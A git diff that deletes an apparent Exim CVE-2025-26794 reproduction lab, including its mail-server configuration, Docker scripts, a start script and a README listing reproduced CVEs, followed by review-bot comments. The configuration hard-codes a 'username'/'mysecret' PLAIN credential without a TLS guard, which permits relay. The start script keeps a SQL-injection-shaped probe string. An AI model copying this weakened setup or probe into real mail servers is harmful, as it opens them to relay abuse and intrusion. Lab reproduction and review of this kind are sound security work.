- -# accept_8bitmime = false - - -# Exim does not make use of environment variables itself. However, -# libraries that Exim uses (e.g. LDAP) depend on specific environment settings. -# There are two lists: keep_environment for the variables we trust, and -# add_environment for variables we want to set to a specific value. -# Note that TZ is handled separately by the timezone runtime option -# and TIMEZONE_DEFAULT buildtime option. - -# keep_environment = ^LDAP -# add_environment = PATH=/usr/bin::/bin - - - -###################################################################### -# ACL CONFIGURATION # -# Specifies access control lists for incoming SMTP mail # -###################################################################### - -begin acl - -acl_smtp_etrn: - accept - - -# This access control list is used for every RCPT command in an incoming -# SMTP message. The tests are run in order until the address is either -# accepted or denied. - -acl_check_rcpt: - - # Accept if the source is local SMTP (i.e. not over TCP/IP). We do this by - # testing for an empty sending host field. - - accept hosts = : - control = dkim_disable_verify - - ############################################################################# - # The following section of the ACL is concerned with local parts that contain - # @ or % or ! or / or | or dots in unusual places. - # - # The characters other than dots are rarely found in genuine local parts, but - # are often tried by people looking to circumvent relaying restrictions. - # Therefore, although they are valid in local parts, these rules lock them - # out, as a precaution. - # - # Empty components (two dots in a row) are not valid in RFC 2822, but Exim - # allows them because they have been encountered. (Consider local parts - # constructed as "firstinitial.secondinitial.familyname" when applied to - # someone like me, who has no second initial.) 
However, a local part starting - # with a dot or containing /../ can cause trouble if it is used as part of a - # file name (e.g. for a mailing list). This is also true for local parts that - # contain slashes. A pipe symbol can also be troublesome if the local part is - # incorporated unthinkingly into a shell command line. - # - # Two different rules are used. The first one is stricter, and is applied to - # messages that are addressed to one of the local domains handled by this - # host. The line "domains = +local_domains" restricts it to domains that are - # defined by the "domainlist local_domains" setting above. The rule blocks - # local parts that begin with a dot or contain @ % ! / or |. If you have - # local accounts that include these characters, you will have to modify this - # rule. - - deny message = Restricted characters in address - domains = +local_domains - local_parts = ^[.] : ^.*[@%!/|] - - # The second rule applies to all other domains, and is less strict. The line - # "domains = !+local_domains" restricts it to domains that are NOT defined by - # the "domainlist local_domains" setting above. The exclamation mark is a - # negating operator. This rule allows your own users to send outgoing - # messages to sites that use slashes and vertical bars in their local parts. - # It blocks local parts that begin with a dot, slash, or vertical bar, but - # allows these characters within the local part. However, the sequence /../ - # is barred. The use of @ % and ! is blocked, as before. The motivation here - # is to prevent your users (or your users' viruses) from mounting certain - # kinds of attack on remote sites. - - deny message = Restricted characters in address - domains = !+local_domains - local_parts = ^[./|] : ^.*[@%!] : ^.*/\\.\\./ - ############################################################################# - - # Accept mail to postmaster in any local domain, regardless of the source, - # and without verifying the sender. 
- - accept local_parts = postmaster - domains = +local_domains - - # Deny unless the sender address can be verified. - - require verify = sender - - # Reject all RCPT commands after too many bad recipients - # This is partly a defense against spam abuse and partly attacker abuse. - # Real senders should manage, by the time they get to 10 RCPT directives, - # to have had at least half of them be real addresses. - # - # This is a lightweight check and can protect you against repeated - # invocations of more heavy-weight checks which would come after it. - - deny condition = ${if and {\ - {>{$rcpt_count}{10}}\ - {<{$recipients_count}{${eval:$rcpt_count/2}}} }} - message = Rejected for too many bad recipients - logwrite = REJECT [$sender_host_address]: bad recipient count high [${eval:$rcpt_count-$recipients_count}] - - # Accept if the message comes from one of the hosts for which we are an - # outgoing relay. It is assumed that such hosts are most likely to be MUAs, - # so we set control=submission to make Exim treat the message as a - # submission. It will fix up various errors in the message, for example, the - # lack of a Date: header line. If you are actually relaying out out from - # MTAs, you may want to disable this. If you are handling both relaying from - # MTAs and submissions from MUAs you should probably split them into two - # lists, and handle them differently. - - # Recipient verification is omitted here, because in many cases the clients - # are dumb MUAs that don't cope well with SMTP error responses. If you are - # actually relaying out from MTAs, you should probably add recipient - # verification here. - - # Note that, by putting this test before any DNS black list checks, you will - # always accept from these hosts, even if they end up on a black list. The - # assumption is that they are your friends, and if they get onto a black - # list, it is a mistake. 
- - accept hosts = +relay_from_hosts - control = submission - control = dkim_disable_verify - - # Accept if the message arrived over an authenticated connection, from - # any host. Again, these messages are usually from MUAs, so recipient - # verification is omitted, and submission mode is set. And again, we do this - # check before any black list tests. - - accept authenticated = * - control = submission - control = dkim_disable_verify - - # Insist that any other recipient address that we accept is either in one of - # our local domains, or is in a domain for which we explicitly allow - # relaying. Any other domain is rejected as being unacceptable for relaying. - - require message = relay not permitted - domains = +local_domains : +relay_to_domains - - # We also require all accepted addresses to be verifiable. This check will - # do local part verification for local domains, but only check the domain - # for remote domains. The only way to check local parts for the remote - # relay domains is to use a callout (add /callout), but please read the - # documentation about callouts before doing this. - - require verify = recipient - - ############################################################################# - # There are no default checks on DNS black lists because the domains that - # contain these lists are changing all the time. However, here are two - # examples of how you can get Exim to perform a DNS black list lookup at this - # point. The first one denies, whereas the second just warns. 
- # - # deny dnslists = black.list.example - # message = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text - # - # warn dnslists = black.list.example - # add_header = X-Warning: $sender_host_address is in a black list at $dnslist_domain - # log_message = found in $dnslist_domain - ############################################################################# - - ############################################################################# - # This check is commented out because it is recognized that not every - # sysadmin will want to do it. If you enable it, the check performs - # Client SMTP Authorization (csa) checks on the sending host. These checks - # do DNS lookups for SRV records. The CSA proposal is currently (May 2005) - # an Internet draft. You can, of course, add additional conditions to this - # ACL statement to restrict the CSA checks to certain hosts only. - # - # require verify = csa - ############################################################################# - - ############################################################################# - # If doing per-user content filtering then recipients with filters different - # to the first recipient must be deferred unless the sender talks PRDR. - # - # defer !condition = $prdr_requested - # condition = ${if > {0}{$recipients_count}} - # condition = ${if !eq {$acl_m_content_filter} \ - # {${lookup PER_RCPT_CONTENT_FILTER}}} - # warn !condition = $prdr_requested - # condition = ${if > {0}{$recipients_count}} - # set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - ############################################################################# - - # At this point, the address has passed all the checks that have been - # configured, so we accept it unconditionally. - - accept - - -# This ACL is used once per recipient, for multi-recipient messages, if -# we advertised PRDR. 
It can be used to perform receipient-dependent -# header- and body- based filtering and rejections. -# We set a variable to record that PRDR was active used, so that checking -# in the data ACL can be skipped. - -.ifdef _HAVE_PRDR -acl_check_prdr: - warn set acl_m_did_prdr = y - - ############################################################################# - # do lookup on filtering, with $local_part@$domain, deny on filter match - # - # deny set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - # condition = ... - ############################################################################# - - accept -.endif - -# This ACL is used after the contents of a message have been received. This -# is the ACL in which you can test a message's headers or body, and in -# particular, this is where you can invoke external virus or spam scanners. -# Some suggested ways of configuring these tests are shown below, commented -# out. Without any tests, this ACL accepts all messages. If you want to use -# such tests, you must ensure that Exim is compiled with the content-scanning -# extension (WITH_CONTENT_SCAN=yes in Local/Makefile). - -acl_check_data: - - # Deny if the message contains an overlong line. Per the standards - # we should never receive one such via SMTP. - # - deny condition = ${if > {$max_received_linelength}{998}} - message = maximum allowed line length is 998 octets, \ - got $max_received_linelength - - # Deny if the headers contain badly-formed addresses. - # - deny !verify = header_syntax - message = header syntax - log_message = header syntax ($acl_verify_message) - - # Deny if the message contains a virus. Before enabling this check, you - # must install a virus scanner and set the av_scanner option above. - # - # deny malware = * - # message = This message contains a virus ($malware_name). - - # Add headers to a message if it is judged to be spam. Before enabling this, - # you must install SpamAssassin. 
You may also need to set the spamd_address - # option above. - # - # warn spam = nobody - # add_header = X-Spam_score: $spam_score\n\ - # X-Spam_score_int: $spam_score_int\n\ - # X-Spam_bar: $spam_bar\n\ - # X-Spam_report: $spam_report - - ############################################################################# - # No more tests if PRDR was actively used. - # accept condition = ${if def:acl_m_did_prdr} - # - # To get here, all message recipients must have identical per-user - # content filtering (enforced by RCPT ACL). Do lookup for filter - # and deny on match. - # - # deny set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - # condition = ... - ############################################################################# - - - # Accept the message. - - accept - - - -###################################################################### -# ROUTERS CONFIGURATION # -# Specifies how addresses are handled # -###################################################################### -# THE ORDER IN WHICH THE ROUTERS ARE DEFINED IS IMPORTANT! # -# An address is passed to each router in turn until it is accepted. # -###################################################################### - -begin routers - -# This router routes to remote hosts over SMTP by explicit IP address, -# when an email address is given in "domain literal" form, for example, -# . The RFCs require this facility. However, it is -# little-known these days, and has been exploited by evil people seeking -# to abuse SMTP relays. Consequently it is commented out in the default -# configuration. If you uncomment this router, you also need to uncomment -# allow_domain_literals above, so that Exim can recognize the syntax of -# domain literal addresses. - -# domain_literal: -# driver = ipliteral -# domains = ! 
+local_domains -# transport = remote_smtp - - -# This router can be used when you want to send all mail to a -# server which handles DNS lookups for you; an ISP will typically run such -# a server for their customers. The hostname in route_data comes from the -# macro defined at the top of the file. If not defined, then we'll use the -# dnslookup router below instead. -# Beware that the hostname is specified again in the Transport. - -.ifdef ROUTER_SMARTHOST - -smarthost: - driver = manualroute - domains = ! +local_domains - transport = smarthost_smtp - route_data = ROUTER_SMARTHOST - ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1 - no_more - -.else - -# This router routes addresses that are not in local domains by doing a DNS -# lookup on the domain name. The exclamation mark that appears in "domains = ! -# +local_domains" is a negating operator, that is, it can be read as "not". The -# recipient's domain must not be one of those defined by "domainlist -# local_domains" above for this router to be used. -# -# If the router is used, any domain that resolves to 0.0.0.0 or to a loopback -# interface address (127.0.0.0/8) is treated as if it had no DNS entry. Note -# that 0.0.0.0 is the same as 0.0.0.0/32, which is commonly treated as the -# local host inside the network stack. It is not 0.0.0.0/0, the default route. -# If the DNS lookup fails, no further routers are tried because of the no_more -# setting, and consequently the address is unrouteable. - -dnslookup: - driver = dnslookup - domains = ! +local_domains - transport = remote_smtp - ignore_target_hosts = 0.0.0.0 : 127.0.0.0/8 -# if ipv6-enabled then instead use: -# ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1 - no_more - -# This closes the ROUTER_SMARTHOST ifdef around the choice of routing for -# off-site mail. -.endif - - -# The remaining routers handle addresses in the local domain(s), that is those -# domains that are defined by "domainlist local_domains" above. 
- - -# This router handles aliasing using a linearly searched alias file with the -# name /etc/aliases. When this configuration is installed automatically, -# the name gets inserted into this file from whatever is set in Exim's -# build-time configuration. The default path is the traditional /etc/aliases. -# If you install this configuration by hand, you need to specify the correct -# path in the "data" setting below. -# -##### NB You must ensure that the alias file exists. It used to be the case -##### NB that every Unix had that file, because it was the Sendmail default. -##### NB These days, there are systems that don't have it. Your aliases -##### NB file should at least contain an alias for "postmaster". -# -# If any of your aliases expand to pipes or files, you will need to set -# up a user and a group for these deliveries to run under. You can do -# this by uncommenting the "user" option below (changing the user name -# as appropriate) and adding a "group" option if necessary. Alternatively, you -# can specify "user" on the transports that are used. Note that the transports -# listed below are the same as are used for .forward files; you might want -# to set up different ones for pipe and file deliveries from aliases. - -system_aliases: - driver = redirect - allow_fail - allow_defer - data = ${lookup{$local_part}lsearch{/etc/aliases}} -# user = exim - file_transport = address_file - pipe_transport = address_pipe - - -# This router handles forwarding using traditional .forward files in users' -# home directories. If you want it also to allow mail filtering when a forward -# file starts with the string "# Exim filter" or "# Sieve filter", uncomment -# the "allow_filter" option. - -# The no_verify setting means that this router is skipped when Exim is -# verifying addresses. Similarly, no_expn means that this router is skipped if -# Exim is processing an EXPN command. 
- -# If you want this router to treat local parts with suffixes introduced by "-" -# or "+" characters as if the suffixes did not exist, uncomment the two local_ -# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated -# in the same way as xxxx@your.domain by this router. Because this router is -# not used for verification, if you choose to uncomment those options, then you -# will *need* to make the same change to the localuser router. (There are -# other approaches, if this is undesirable, but they add complexity). - -# The check_ancestor option means that if the forward file generates an -# address that is an ancestor of the current one, the current one gets -# passed on instead. This covers the case where A is aliased to B and B -# has a .forward file pointing to A. - -# The three transports specified at the end are those that are used when -# forwarding generates a direct delivery to a file, or to a pipe, or sets -# up an auto-reply, respectively. - -userforward: - driver = redirect - check_local_user -# local_part_suffix = +* : -* -# local_part_suffix_optional - file = $home/.forward -# allow_filter - no_verify - no_expn - check_ancestor - file_transport = address_file - pipe_transport = address_pipe - reply_transport = address_reply - - -# This router matches local user mailboxes. If the router fails, the error -# message is "Unknown user". - -# If you want this router to treat local parts with suffixes introduced by "-" -# or "+" characters as if the suffixes did not exist, uncomment the two local_ -# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated -# in the same way as xxxx@your.domain by this router. 
- -localuser: - driver = accept - check_local_user -# local_part_suffix = +* : -* -# local_part_suffix_optional - transport = local_delivery - cannot_route_message = Unknown user - - - -###################################################################### -# TRANSPORTS CONFIGURATION # -###################################################################### -# ORDER DOES NOT MATTER # -# Only one appropriate transport is called for each delivery. # -###################################################################### - -# A transport is used only when referenced from a router that successfully -# handles an address. - -begin transports - - -# This transport is used for delivering messages over SMTP connections. - -remote_smtp: - driver = smtp -.ifdef _HAVE_TLS_RESUME - tls_resumption_hosts = * -.endif - - -# This transport is used for delivering messages to a smarthost, if the -# smarthost router is enabled. This starts from the same basis as -# "remote_smtp" but then turns on various security options, because -# we assume that if you're told "use smarthost.example.org as the smarthost" -# then there will be TLS available, with a verifiable certificate for that -# hostname, using decent TLS. - -smarthost_smtp: - driver = smtp - multi_domain - # -.ifdef _HAVE_TLS - # Comment out any of these which you have to, then file a Support - # request with your smarthost provider to get things fixed: - hosts_require_tls = * - tls_verify_hosts = * - # As long as tls_verify_hosts is enabled this will have no effect, - # but if you have to comment it out then this will at least log whether - # you succeed or not: - tls_try_verify_hosts = * - # - # The SNI name should match the name which we'll expect to verify; - # many mail systems don't use SNI and this doesn't matter, but if it does, - # we need to send a name which the remote site will recognize. - # This _should_ be the name which the smarthost operators specified as - # the hostname for sending your mail to. 
- tls_sni = ROUTER_SMARTHOST - # -.ifdef _HAVE_OPENSSL - tls_require_ciphers = HIGH:!aNULL:@STRENGTH -.endif -.ifdef _HAVE_GNUTLS - tls_require_ciphers = SECURE192:-VERS-SSL3.0:-VERS-TLS1.0:-VERS-TLS1.1 -.endif -.ifdef _HAVE_TLS_RESUME - tls_resumption_hosts = * -.endif -.endif - - -# This transport is used for local delivery to user mailboxes in traditional -# BSD mailbox format. By default it will be run under the uid and gid of the -# local user, and requires the sticky bit to be set on the /var/mail directory. -# Some systems use the alternative approach of running mail deliveries under a -# particular group instead of using the sticky bit. The commented options below -# show how this can be done. - -local_delivery: - driver = appendfile - file = /var/mail/$local_part_data - delivery_date_add - envelope_to_add - return_path_add -# group = mail -# mode = 0660 - - -# This transport is used for handling pipe deliveries generated by alias or -# .forward files. If the pipe generates any standard output, it is returned -# to the sender of the message as a delivery error. Set return_fail_output -# instead of return_output if you want this to happen only when the pipe fails -# to complete normally. You can set different transports for aliases and -# forwards if you want to - see the references to address_pipe in the routers -# section above. - -address_pipe: - driver = pipe - return_output - - -# This transport is used for handling deliveries directly to files that are -# generated by aliasing or forwarding. - -address_file: - driver = appendfile - delivery_date_add - envelope_to_add - return_path_add - - -# This transport is used for handling autoreplies generated by the filtering -# option of the userforward router. 
- -address_reply: - driver = autoreply - - - -###################################################################### -# RETRY CONFIGURATION # -###################################################################### - -begin retry - -# This single retry rule applies to all domains and all errors. It specifies -# retries every 15 minutes for 2 hours, then increasing retry intervals, -# starting at 1 hour and increasing each time by a factor of 1.5, up to 16 -# hours, then retries every 6 hours until 4 days have passed since the first -# failed delivery. - -# WARNING: If you do not have any retry rules at all (this section of the -# configuration is non-existent or empty), Exim will not do any retries of -# messages that fail to get delivered at the first attempt. The effect will -# be to treat temporary errors as permanent. Therefore, DO NOT remove this -# retry rule unless you really don't want any retries. - -# Address or Domain Error Retries -# ----------------- ----- ------- - -* * F,2h,15m; G,16h,1h,1.5; F,4d,6h - - - -###################################################################### -# REWRITE CONFIGURATION # -###################################################################### - -# There are no rewriting specifications in this default configuration file. - -begin rewrite - - - -###################################################################### -# AUTHENTICATION CONFIGURATION # -###################################################################### - -# The following authenticators support plaintext username/password -# authentication using the standard PLAIN mechanism and the traditional -# but non-standard LOGIN mechanism, with Exim acting as the server. -# PLAIN and LOGIN are enough to support most MUA software. -# -# These authenticators are not complete: you need to change the -# server_condition settings to specify how passwords are verified. 
-# They are set up to offer authentication to the client only if the -# connection is encrypted with TLS, so you also need to add support -# for TLS. See the global configuration options section at the start -# of this file for more about TLS. -# -# The default RCPT ACL checks for successful authentication, and will accept -# messages from authenticated users from anywhere on the Internet. - -begin authenticators - -# PLAIN authentication has no server prompts. The client sends its -# credentials in one lump, containing an authorization ID (which we do not -# use), an authentication ID, and a password. The latter two appear as -# $auth2 and $auth3 in the configuration and should be checked against a -# valid username and password. In a real configuration you would typically -# use $auth2 as a lookup key, and compare $auth3 against the result of the -# lookup, perhaps using the crypteq{}{} condition. - -PLAIN: -driver = plaintext -public_name = PLAIN -server_condition = “$if{{ and {{eq{$auth2}{username}}{eq{$auth3}{mysecret}}}}” -server_set_id = $auth2 - -# server_prompts = : -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } -#PLAIN: -# driver = plaintext -# server_set_id = $auth2 -# server_prompts = : -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } - -# LOGIN authentication has traditional prompts and responses. There is no -# authorization ID in this mechanism, so unlike PLAIN the username and -# password are $auth1 and $auth2. Apart from that you can use the same -# server_condition setting for both authenticators. 
- -#LOGIN: -# driver = plaintext -# server_set_id = $auth1 -# server_prompts = <| Username: | Password: -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } - - -###################################################################### -# CONFIGURATION FOR local_scan() # -###################################################################### - -# If you have built Exim to include a local_scan() function that contains -# tables for private options, you can define those options here. Remember to -# uncomment the "begin" line. It is commented by default because it provokes -# an error with Exim binaries that are not built with LOCAL_SCAN_HAS_OPTIONS -# set in the Local/Makefile. - -# begin local_scan - - -# End of Exim configuration file diff --git a/CVE-2025-26794/files/connect_docker.sh b/CVE-2025-26794/files/connect_docker.sh deleted file mode 100644 index 37f7c8f..0000000 --- a/CVE-2025-26794/files/connect_docker.sh +++ /dev/null @@ -1 +0,0 @@ -sudo docker exec -it exim bash diff --git a/CVE-2025-26794/files/docker.sh b/CVE-2025-26794/files/docker.sh deleted file mode 100644 index 5d5cfa3..0000000 --- a/CVE-2025-26794/files/docker.sh +++ /dev/null @@ -1,4 +0,0 @@ -sudo docker build -t exim . -sudo docker container rm -f exim -sudo docker run --name exim --cap-add SYS_PTRACE --security-opt seccomp=unconfined -d -p 25:25 -i -t exim -sudo docker exec -i -t exim /bin/bash diff --git a/CVE-2025-26794/files/start-exim.sh b/CVE-2025-26794/files/start-exim.sh deleted file mode 100644 index 3925f98..0000000 --- a/CVE-2025-26794/files/start-exim.sh +++ /dev/null @@ -1,3 +0,0 @@ -/usr/exim/bin/exim -bd -q30m -d -#gdb -p `ps aux | grep 'exim' | awk 'NR==1{print $2}'` -#/usr/exim/bin/exim -d -be '${lookup {test'\'' AND 1=2 \* } dbm {/var/spool/exim/db/misc} }' \ No newline at end of file diff --git a/README.md b/README.md deleted file mode 100644 index 2e16bea..0000000 --- a/README.md +++ /dev/null 
@@ -1,68 +0,0 @@ -# Reproduction of Recent CVEs - -This repository is based on recently discovered CVEs and focuses on how to exploit, patch, and investigate the root causes of these vulnerabilities. DefHawk is working on high-critical CVEs that have caused significant damage to services, aiming to explore the extent of the impact. - -Each section in this repository is dedicated to a specific vulnerability and contains all the information needed to set up a safe environment. Some sections also include instructions on exploiting the vulnerability in real-world scenarios. After thorough research, a detailed report will be attached to each section. - -For a list of CVEs covered, see the following document: -[Google Sheets List of CVEs](https://docs.google.com/spreadsheets/d/1M6E_NRWxdLzWCeyMM0Dgepo36WiLItvFS30I3dHeWO0/) - - - - -# CVE-XXXX-XXXX - - -| **Step** | **Details** | **Progress** | -|------------------------------------|----------------------------------------------------------------------------------------------------------------------|-------------------| -| **Set up a Safe Testing Env** | | :heavy_check_mark: | -| - Create a Virtual Lab | Use VirtualBox, VMware, or Docker to create an isolated environment. | :heavy_check_mark: -| - Choose a Suitable OS | Install an OS compatible with the CVEs (e.g., Linux, Windows, or a specific version of software). | According to the CVE :heavy_check_mark: -| - Install Necessary Tools | Include tools like Metasploit, Burp Suite, or specific debugging tools relevant to the CVEs. | :heavy_check_mark: -| **Select Recent CVEs to Reproduce**| | -| - Severity and Exploitability | Focus on CVEs with high CVSS scores and known exploitation in the wild. | :heavy_check_mark: -| - Availability of Public PoCs | Choose vulnerabilities with available PoCs for easier reproduction. | :heavy_check_mark: -| - Compatibility with My Env | Ensure the CVE is compatible with your virtual lab setup (OS and software versions). 
| ❎ -| **Download and Set up the PoCs** | | -| - Find the PoCs in Test Env | Search on GitHub or Exploit-DB for reliable PoCs related to selected CVEs. | :heavy_check_mark: -| - Verify PoC and Audit | Carefully read and test the PoC in a controlled environment; audit output to ensure it matches expected behavior. | :heavy_check_mark: -| **Simulate and Document Process** | | -| - Prepare Documentation | Document each setup step, including OS, software versions, and configurations. | ⏲️ -| - Execute the Exploit | Run the PoC and capture screenshots or logs to verify successful exploitation. | ⏲️ -| - Analyze the Results | Explain how the vulnerability was exploited and why it works, with screenshots or logs as evidence. | -| **Present the Findings** | | -| - Overview of the CVEs | Provide a brief summary, CVSS score, and affected software for each CVE. | -| - Reproduction Steps | Include clear instructions for setting up and reproducing each CVE in a controlled environment. | -| - Screenshots and Evidence | Add screenshots or logs showing successful exploitation. | -| - Mitigation | List any patches, configuration changes, or mitigations for each vulnerability. | -| **Additional Tips** | | -| - Security Practice and Approach | Follow safe security practices and take a controlled "hacker" approach to prevent risks. | - - - -## 📌 CVEs Included - -| CVE ID | Description | -|---------------------|------------| -| **CVE-2020-7660** | **`serialize-javascript` Remote Code Execution**: A vulnerability in `serialize-javascript` allows attackers to execute arbitrary code during the deserialization process. | -| **CVE-2024-31982** | **XWiki Remote Code Execution (RCE)**: An RCE vulnerability in XWiki enables attackers to execute arbitrary code remotely, compromising the affected system. 
| -| **CVE-2024-45519** | **Zimbra Remote Command Execution (RCE)**: A vulnerability in Zimbra allows remote attackers to execute arbitrary commands on the server, potentially leading to full system compromise. | -| **CVE-2024-46538** | **pfSense Cross-Site Scripting (XSS)**: A cross-site scripting vulnerability in pfSense v2.5.2 allows attackers to inject arbitrary web scripts or HTML via a crafted payload, potentially leading to unauthorized access or data leakage. | -| **CVE-2024-49113** | **Grafana Command Injection and Local File Inclusion**: An issue in Grafana's SQL Expressions feature allows attackers to execute arbitrary commands and include local files, potentially leading to remote code execution and unauthorized file access. | -| **CVE-2024-9264** | **Grafana Command Injection and Local File Inclusion**: Another critical vulnerability in Grafana's SQL Expressions feature enables command injection and local file inclusion, posing significant security risks. | -| **CVE-2025-0411** | **7-Zip Mark-of-the-Web Bypass**: A vulnerability in 7-Zip allows attackers to bypass the Mark-of-the-Web protection mechanism, potentially executing malicious code without user consent. | -| **CVE-2025-26794** | **Exim Remote SQL Injection**: A vulnerability in Exim versions prior to 4.98.1 allows remote attackers to perform SQL injection attacks, potentially compromising the mail server. | - -## 🚀 How to Use -1. Clone the repository: - ```bash - git clone https://github.com/defhawk-specter/defhawk-cve.git - ``` - -2. Navigate to the CVE folder of interest -. -3. Follow the instructions in the respective CVE directory. - -## Disclaimer - -This repository is strictly for educational and research purposes. Any misuse of this information is strictly prohibited. Use at your own risk!
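Review bot: the live `PLAIN` authenticator in the deleted `configure` (the `PLAIN:` block under `begin authenticators`) is both syntactically wrong and unsafe, and must not be restored in this shape. `server_condition = “$if{{ and {{eq{$auth2}{username}}{eq{$auth3}{mysecret}}}}”` uses typographic quotes and `$if{{` rather than Exim's `${if ...}` expansion; the working form is `server_condition = ${if and {{eq{$auth2}{username}}{eq{$auth3}{mysecret}}}}`. It also hard-codes `username`/`mysecret` and drops the `server_advertise_condition = ${if def:tls_in_cipher }` guard that the commented template right below it keeps, so PLAIN is offered over cleartext SMTP, and because `acl_check_rcpt` has `accept authenticated = *` with `control = submission`, anyone presenting that fixed credential gets unrestricted relay. Gate advertising on TLS and verify against a lookup with `crypteq`, as the file's own comment above the block suggests. Separately, `acl_smtp_etrn:` is an unconditional `accept`, so any client may issue ETRN; that is presumably deliberate for the reproduction, but it should be stated in the lab notes rather than left as an unexplained departure from the stock configuration.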
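Review bot: `docker.sh` publishes the lab's SMTP port on every host interface with `-p 25:25` and weakens the sandbox with `--cap-add SYS_PTRACE --security-opt seccomp=unconfined`; combined with the bundled configuration's fixed credential and `accept authenticated = *`, running it anywhere but an isolated box exposes a guessable-credential relay to the network. If the scripts are kept or reinstated, bind to loopback (`-p 127.0.0.1:25:25`) and document that the ptrace/seccomp relaxations exist only so `gdb` can attach per `start-exim.sh`.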
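Review bot: in `start-exim.sh` the commented `gdb -p` line selects its PID with `ps aux | grep 'exim' | awk 'NR==1{print $2}'`, which can return the `grep` process or the invoking shell instead of the listening daemon; `pgrep -o -x exim` is the reliable form. The other commented line, `exim -d -be '${lookup {test'\'' AND 1=2 \* } dbm {/var/spool/exim/db/misc} }'`, feeds an SQL-injection-shaped string to a `dbm` lookup, which is a key/value lookup type with no SQL behind it, while the README row describes CVE-2025-26794 as remote SQL injection; whatever this probe was meant to test, it is the only trace of the CVE-2025-26794 reproduction in the tree and deleting it without a pointer to where the PoC went leaves the CVE directory undocumented. The script also lacks a shebang and a trailing newline (`\ No newline at end of file`).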
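Review bot: the deleted top-level `README.md` is the repository's only index, and this diff removes it while leaving `CVE-2024-45519`, `CVE-2024-46538`, `CVE-2024-49113`, `CVE-2024-9264` and `CVE-2025-0411` (all listed in its table) untouched, so those directories lose their description and the `How to Use` steps; if the whole repository is being retired, the commit should say so, otherwise keep the README and drop only the rows for the CVEs actually removed here. If the table is kept, fix two defects in it: the `CVE-2024-49113` row carries the same Grafana SQL Expressions description as the `CVE-2024-9264` row directly beneath it (which even opens with "Another critical vulnerability"), so one identifier is mislabelled, and step 2 of `How to Use` is split across two lines (`Navigate to the CVE folder of interest` / `.`).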